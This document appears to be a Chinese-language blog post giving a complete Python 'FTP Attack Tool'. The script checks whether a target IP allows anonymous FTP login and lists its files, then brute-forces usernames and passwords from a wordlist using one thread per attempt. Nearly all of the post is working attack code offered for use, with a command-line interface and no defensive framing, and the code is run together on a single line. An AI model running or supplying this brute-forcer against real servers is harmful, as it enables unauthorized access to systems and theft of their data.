利用Python编写完整的FTP攻击代码(包含匿名登录检查以及用户名密码暴力破解)
本代码主要包括以下方法:
1. 输入参数合理性检查,包括检查输入是否为合法的IP地址,输入的字典文件是否存在等;
2. 检查目标是否允许匿名登录
3. 基于字典破解FTP服务器的登录用户名与密码
import ftplib import threading import sys import os import optparse import ipaddress import termcolor class ftp_attack: def __init__(self,target, wordlist): self.target = target self.wordlist = wordlist def checK_anonymous_login(self): try: ftpclient = ftplib.FTP(self.target) ftpclient.login('anonymous','anonymous') print("The Target Allows Anonymous Login!") res = ftpclient.nlst() # print(res) if len(res)>0: for file in res: print(file) ftpclient.close() except: print("The Target Does Not Allow Anonymous Login!") def ftp_login(self, username, password): print("Trying username and password: %s %s" % (username, password)) try: ftpclient = ftplib.FTP(self.target) ftpclient.login(username, password) print(termcolor.colored("Username and password found for the target: %s %s" % (username, password),'blue')) ftpclient.close() except: pass def brute_forcer(self): with open(self.wordlist, 'r') as f: for line in f.readlines(): username = line.split(':')[0].strip() password = line.split(":")[1].strip() t = threading.Thread(target=self.ftp_login, args=(username, password)) t.start() def run(self): self.checK_anonymous_login() print("Begin to crack username and password!!!\n") print('======================================================') self.brute_forcer() def check_target_valid(target): try: ipaddress.ip_address(target) return True except: return False def banner(): banner = """ ****************************************************************** ****************************************************************** FTP Attack Tool by Jason Wong V1.0 ****************************************************************** ****************************************************************** """ print(banner) def get_params(): parser = optparse.OptionParser("Usage: <Program> -t target -w wordlist") parser.add_option('-t', '--target', dest='target', type='string', help='Specify target IP address') parser.add_option('-w', '--wordlist', dest='wordlist', type='string', help='Specify file path of wordlist to crack') options, args = parser.parse_args() if options.target is None or options.wordlist is None: print(parser.usage) sys.exit(0) if not check_target_valid(options.target): print("[-] Please Enter right IP address of Target!") sys.exit(0) if not os.path.exists(options.wordlist): print("[-] The File Does Not Exist") sys.exit(0) return options.target, options.wordlist if __name__ == "__main__": banner() target, dict_list = get_params() ftpattack_instance = ftp_attack(target, dict_list) ftpattack_instance.run()
STRIVE FOR PROGRESS,NOT FOR PERFECTION
